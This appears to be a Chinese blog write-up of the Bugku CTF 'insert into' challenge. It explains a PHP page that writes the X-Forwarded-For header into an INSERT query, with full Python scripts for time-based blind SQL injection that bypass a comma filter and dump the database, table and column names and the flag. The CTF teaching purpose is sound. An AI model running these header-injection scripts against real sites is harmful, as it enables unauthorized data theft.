bugku-web-insert into 注入

最新推荐文章于 2022-07-26 18:06:57 发布
最新推荐文章于 2022-07-26 18:06:57 发布
阅读量231 收藏
点赞数
文章标签: python 数据库 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realstarstarli/article/details/107895338
版权

insert into 注入

题目分析

题目地址http://123.206.87.240:8002/web15/
首先题目中已经给出了php源码,先分析一下。我在原来的代码上做了一些修改,便于调试操作。

<?php
    //隐藏报错信息
    error_reporting(0);
    // 函数功能获取用户的ip地址
    function getIp()
    {
      // PHP使用$_SERVER['HTTP_X_FORWARDED_FOR']获取IP
      // 当没用XFF头就用$_SERVER['REMOTE_ADDR'];获取IP。
      $ip = '';
      if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
          $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
      } else {
          $ip = $_SERVER['REMOTE_ADDR'];
      }
      // ip过滤掉逗号,以逗号将内容分成数组
      $ip_arr = explode(',', $ip);
      return $ip_arr[0];
    }
    // 设置服务器ip,用户名,密码,数据库名
    $host = "localhost";
    $user = "";
    $pass = "";
    $db = "";
    // 连接数据库,不然给出错误信息	mysql_connect()已经在php5.5版本以上修改为mysqli_connect()
    $connect = mysqli_connect($host, $user, $pass) or die("Unable to connect");
    // 选中数据库,不然给出错误信息	mysql_select_db()已经在php5.5版本以上修改为mysqli_select_db()
    mysqli_select_db($connect, $db) or die("Unable to select database");
    // 获取用户的ip
    $ip = getIp();
    // 输出用户的ip
    echo 'your ip is :' . $ip;
    // 构造sql语句
    $sql = "insert into client_ip (ip) values ('$ip')";
    // insert into client_ip (ip) values ('1') select * from 1#')
    // 发送sql语句mysql_query()已经在php5.5版本以上修改为mysqli_query()
    mysqli_query($connect, $sql);
?>

通过对于源代码的分析我们可以知道,会获取X-ForWarded-For(XFF)请求头字段所记录的IP地址(可控),如果没有设置XFF头就会获取正在浏览当前页面用户的 IP 地址(不可控)。然后将该IP放入 client_ip表中的ip字段中。

既然这道题已经提示说是注入,那么这肯定是一道sql注入,唯一的切入点便是对XFF头中IP的设置,因为这个不像成绩单那道题一样能够显示查询结果,加之题目说写一个python脚本,我们尝试一下时间延迟盲注。

时间延迟盲注,是通过sleep()函数设置sql语句,之后通过响应的时间来判断查询内容。

举个栗子:

我们还是继续采用成绩单那个测试数据库来举例子。

新建一张测试表数据

create table test_student(
    -> id int(4) not null primary key auto_increment ,
    -> class char(20) not null);

先插入一条数据

insert into test_student(class) value(1001);

 select * from test_student;
+----+-------+
| id | class |
+----+-------+
|  1 | 1001  |
+----+-------+

如何体现时间延迟,我们修改一下SQL语句

insert into test_student(class) value(1002 and sleep(5));

 select * from test_student;
+----+-------+
| id | class |
+----+-------+
|  1 | 1001  |
|  2 | 0     |
+----+-------+

这条语句因为sleep(5)会延迟5秒注入 1002 and sleep(5) 逻辑判断值是0,所以插入的值为0

根据这个点我们可以构造出SQL语句,通过判断响应的时间来进行一系列的操作,我们要暴力得到数据库名,库中的表名,表中的字段名,字段中的内容。

先看一下源代码中的SQL语句

insert into client_ip (ip) values ('$ip')

怎么暴力库名,直接给出python的脚本(无论是暴库还是暴表还是暴字段内容,这都是一个框架,改变的只是SQL语句)

代码分析

暴历库名

源代码
import requests
# 给出所有的可能出现字符
ch = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.'
# 设定url
url = "http://123.206.87.240:8002/web15/"
# 记录爆出的库名
database = ''
# 猜想库名长度不超过10
for i in range(1, 10):
    # 每次选中一个字符参与暴历
    for str1 in ch:
        # 该语句用于暴历库名
        sql="1' and (case when substr(database() from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#"
        # print(sql)
        # 设置头部信息
        header = {'X-ForWarded-For': sql}
        try:
            # 用get方式请求页面,响应时间不得超过3秒钟。如果超过,就会抛出异常
            requests.get(url, headers=header, timeout=3)
        except:
            # 如果出现异常就记录该字符,说明该字符是所得的内容
            database+=str1
            break
# 输出(库名,表名,列名,内容)
print(database)
# 报出库名字web15

这段代码是暴历数据库的代码,我们先分析一下SQL注入语句

"1' and (case when substr(database() from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#"

结合题目所给的SQL语句,得到完整的SQL语句

insert into client_ip (ip) values ('1' and (case when substr(database() from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#')

这里的str(i) 和str1我们用首次遍历的值来代替

insert into client_ip (ip) values ('1' and (case when substr(database() from 1 for 1)=‘0’ then sleep(5) else 1 end))#')
case when …then …else…end语句

形成了完整的SQL语句,我们主要分析一下case (搜索函数)开始的部分

case

​ when <表达式语句1-1> then <表达式语句2-1>

​ when <表达式语句1-2> then <表达式语句2-2>

​ when <表达式语句1-3> then <表达式语句2-3>

​ …

​ else <表达式语句3-n>

​ end

其实这个和C语言的case很像,实际上这就是if …else if …else if …else语句,其实SQL语句里面也有if语句但是其中if语句的形式是if(exp1,exp2,exp3)【if(表达式, 表达式成立的值, 表达式不成立的值)】

但是源代码中explode(',', $ip)对逗号进行过滤,所以会导致SQL语句的不完整,所以这里采用case when …then …else…end

substr()函数

database()函数会返回当前的数据库名称

substr(string,index,length),本来substr()字符串截取函数,应该是这样的从string字符串中,从第index个开始取length个字符构成字符串

比如substr(“Hello World”,1,3)便会得到Hel(这个函数的索引是从1开始的)

但是这里的都逗号会被过滤,所以我们不能用这样的格式去做,需要换一种方式

substr(string from index for length)效果和substr(string,index,length)一样

所以这条语句的意思就是,从database()返回的数据库名中依次取一个字符与字典中的字符比较,如果出现相等的情况,就延迟响应,延迟5秒(sleep(5)),requests.get(url, headers=header, timeout=3)我们设置了响应时间至少的3秒,所以出现5秒的情况便是数据库名称中含有该字符,我们就将这个字符取出来,最后遍历出所有的字符,从而得到库名。

运行这段代码,所得到的的库名为web15

暴历表名

源代码

import requests
# 给出所有的可能出现字符
ch = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.'
# 设定url
url = "http://123.206.87.240:8002/web15/"
# 记录爆出的表名
table = ''
# 猜想表名长度不超过20
for i in range(1, 20):
    # 每次选中一个字符参与暴历
    for str1 in ch:
        # 该语句用于暴历表名
        sql="1' and (case when substr((select group_concat(table_name) from information_schema.tables where table_schema='web15') from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#"
        # print(sql)
        # 设置头部信息
        header = {'X-ForWarded-For': sql}
        try:
            # 用get方式请求页面,响应时间不得超过3秒钟。如果超过,就会抛出异常
            requests.get(url, headers=header, timeout=3)
        except:
            table+=str1
            break
# 输出表名
print(table)
# 爆出表名client_ipflag根据php的sql语句可以知道client_ip是其中的一张表 所以另一张表是flag

我们构造SQL语句

1' and (case when substr((select group_concat(table_name) from information_schema.tables where table_schema='web15') from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#

完整的SQL语句

insert into client_ip (ip) values(‘1' and (case when substr((select group_concat(table_name) from information_schema.tables where table_schema='web15') from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#

同样的我们只是关注case部分的代码(str(i) 和str1我们用首次遍历的值来代替)

 (case when substr((select group_concat(table_name) from information_schema.tables where table_schema='web15') from 1 for 1)=’0‘ then sleep(5) else 1 end)

结构其实和暴历库名没有什么区别,关键是在于这一句,这句话能够获取当前库中所有的表名

select group_concat(table_name) from information_schema.tables where table_schema='web15'

在information_schema数据库中的 tables表中是存有所有数据库的名字和对应的表名,对应的字段名是 table_schema和table_name

information_schema.tables是绝对路径访问,选中的是information_schema库中tables表

具体可以看我以前的博客https://blog.csdn.net/realstarstarli/article/details/106754435(基于bugku web 成绩单的sql注入入门)

group_concat()函数

group_concat()函数能够将查询的内容形成一个字符串

举个栗子

show tables;
+--------------------+
| Tables_in_stu_info |
+--------------------+
| s_login            |
| stu_gredes         |
| t_login            |
| test_student       |
+--------------------+

我们测试库stu_info数据库有四张表,没有用group_concat()函数情况下

select table_name from information_schema.tables where table_schema='stu_info';
+--------------+
| table_name   |
+--------------+
| s_login      |
| stu_gredes   |
| t_login      |
| test_student |
+--------------+
4 rows in set (0.00 sec)

结果是4行的数据

用group_concat()函数

select group_concat(table_name) from information_schema.tables where table_schema='stu_info';
+-----------------------------------------+
| group_concat(table_name)                |
+-----------------------------------------+
| s_login,stu_gredes,t_login,test_student |
+-----------------------------------------+
1 row in set (0.00 sec)

结果是一行数据

一行数据后所得一个字符串,和暴历库名一样暴历表名

爆出表名client_ipflag根据php的sql语句可以知道client_ip是其中的一张表 所以另一张表是flag(逗号会被过滤掉,原本应该是client_ip,flag应该也是可以观察出来的)

暴历字段名

源代码
import requests
# 给出所有的可能出现字符
ch = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.'
# 设定url
url = "http://123.206.87.240:8002/web15/"
# 记录爆出的列名
coulmn = ''
# 猜想列名不超过20
for i in range(1, 20):
    # 每次选中一个字符参与暴历
    for str1 in ch:
        # 该语句用于暴历列名
        sql="1' and (case when substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from "+str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#"
        # print(sql)
        # 设置头部信息
        header = {'X-ForWarded-For': sql}
        try:
            # 用get方式请求页面,响应时间不得超过3秒钟。如果超过,就会抛出异常
            requests.get(url, headers=header, timeout=3)
        except:
            # 如果出现异常就记录该字符,说明该字符是所得的内容
            coulmn+=str1
            break
# 输出列名
print(coulmn)
# 爆出列名flag

select group_concat(column_name) from information_schema.columns where table_name='flag'

在information_schema数据库中的columns表中是存有所有表的名字和对应的字段名,对应的字段名是 table_name和column_name

所以采用一样的方式暴历出列名, 爆出列名flag

暴历字段内容(获取flag)

源代码
import requests
# 给出所有的可能出现字符
ch = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.'
# 设定url
url = "http://123.206.87.240:8002/web15/"
content = ''
# 猜想内容长度不超过40
for i in range(1, 40):
    # 每次选中一个字符参与暴历
    for str1 in ch:
         # 该语句用于暴历内容
        sql = "1'and (case when substr((select group_concat(flag) from flag) from " + \
            str(i)+" for 1)='"+str1+"' then sleep(5) else 1 end))#"
        # print(sql)
        # 设置头部信息
        header = {'X-ForWarded-For': sql}
        try:
            # 用get方式请求页面,响应时间不得超过3秒钟。如果超过,就会抛出异常
            requests.get(url, headers=header, timeout=3)
        except:
            # 如果出现异常就记录该字符,说明该字符是所得的内容
            content += str1
            break
# 输出内容
print(content)
# 爆出内容cdbf14c9551d5be5612f7bb5d2867853

所以flag:flag[cdbf14c9551d5be5612f7bb5d2867853]

_starstarli
关注
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1357
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
bugku web——INSERT INTO注入
xiaoduanDDG的博客
08-13 226
bugku web——INSERT INTO注入 最爱的代码审计来 初步判断存在sql注入(请求头) 并且过滤了逗号 抓包试了一下,网页上没有回显点,所以是基于时间的盲注() 正常时间盲注用这种格式来完成 if(exp1,exp2,exp3) 但是代码中explode()函数已经将逗号过滤掉了 所以采用这种格式:case when exp1 then sleep(1) else end 来绕过逗号的过滤 exp1中字符串截取subtr1(str,1,1)又存在逗号,于是这里用substr (str) f
Bugkuweb INSERT INTO注入
qq_26961571的博客
09-09 204
打开之后, ​ 发现了一串代码,而这串代码就是php。一看这么多,我其实还是很有畏难情绪的,感觉脑壳都大了。但是怎么办,还是得硬上啊!!都已经啃到这里了,现在放弃也太可惜了吧其实最近思虑很多,感觉没有未来。每次都说那能怎么办呢??是啊,能怎么办呢?只能尽全力去想去做,但是真的好累。我又是缺乏安全感的人,要通过自己的努力调节情绪,已经不止一次想过要放弃了,放弃是多么简单的事情,比鼓起勇气的死亡还要简单的多。 回到正题,仔细分析一下代码。 error_reporting(0);​funct..
bugku webINSERT INTO注入
weixin_30321449的博客
09-16 96
0x01:   打开题目描述,已经将源码给了我们: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERV...
Bugku-INSERT INTO 注入
苟有恒,必有三更眠,五更起。
07-08 956
INSERT INTO 注入 原题链接 http://120.24.86.145:8002/web15/ 分析 题目给出源码 &lt;?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVE...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
Bugku INSERT-INTO注入
ChanCherry的博客
11-20 201
error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = explode(',', $ip...
bugku webINSERT INTO注入.docx
05-16
### bugku WebINSERT INTO注入知识点详解 #### 一、背景与目标 在CTF(Capture The Flag)比赛中,Web安全挑战是常见的题型之一。本文档中的“bugku webINSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1971
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
bugku-INSERT INTO注入(附代码) 详细
偷一个月亮
06-19 664
# -*-coding:utf-8-*- # author : wen # flag:wen{b7bb30b3435f2e7c418b131f9e789f81} import requests import time url = 'http://123.206.87.240:8002/web15/' payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
bugku------INSERT INTO 注入
bylfsj的博客
09-30 484
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1454
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
bugku_web_INSERT INTO 注入
weixin_30809173的博客
10-01 83
首先一打开就能看到源码,放到notepad++里面审计一下: 大概懂了这段代码的意思:获取你的ip,然后把你的ip插入到client_ip表中的ip列中去。 接下来就是将注入命令不停地赋值给“ip地址”, 然后来猜测flag表里的flag列的值//这就算是出题人和做题人之间的一种默契啦。 # -*- coding:utf-8 -*- import requests i...
bugku学习之37.insert into注入
s11show_163的博客
03-04 608
考察: xff头注入 insert into 注入格式是1'+(注入语句)# 延时注入 逗号屏蔽$ip_arr = explode(',', $ip);下无法使用if注入以及对substr函数修改引出的启发 给出了源码提示: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_...
php+insert+into+注入,PHP注入总结(写给自己)
weixin_36087083的博客
03-10 1689
' or 1=1' or '1=1'/*'%23' and password='mypassid=-1 union select 1,1,1id=-1 union select char(97),char(97),char(97)id=1 union select 1,1,1 from membersid=1 union select 1,1,1 from adminid=1 union sele...
Bugku sql注入
m0_63253040的博客
07-26 1081
过滤了length,like,information,and,union,select,order,where等等。得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据。用括号绕过空格,我们发现能用的字符有,or,'得到数据表admin和字段名password后。先万能密码试试看,是不等于的意思。是用字典跑出数据表和字段,这里先跳过。提示这题布尔盲注,先fuzz一波。可以确定这里有布尔盲注。去登录账号是admin。最后利用脚本爆出数据库。得到密码bugctf。进入环境是个登录页面。...
Bugku WEB sql注入
qq_41696858的博客
07-27 581
明显的布尔盲注。md5值和之前的一样,bugkuctf 这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。 然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格 把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了 import requests #password一般由大小写字母和数字组成 allString = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
1-3DML语言与INsert注入逻辑
山兔的博客
12-09 727
1.什么DML? DML:数据操作语言(data manipulation language) 功能:主要是对表、视图等对象进行查询、插入、更新和删除操作,如果我们没有特殊的说明,主要是对表的操作 包括: SELECT 查询 INSERT 插入 UPDATE 更新 DELETE 删除 实战演示 打开kali的终端,输入mysql -uroot,访问mysql数据库 我们这篇文章演示要用到一个示例的数据库,我们自己创一个数据库。create database hxf default charset utf8
利用X-Forwarded-For注入:时间盲注与SQL技巧
这个Bugku Web题目的INSERT INTO注入挑战要求选手运用高级的SQL注入技巧,尤其是时间盲注,来破解服务器的输入过滤机制,以获取数据库的相关信息。这既考察了技术能力,也考验了在实际环境中解决问题的策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值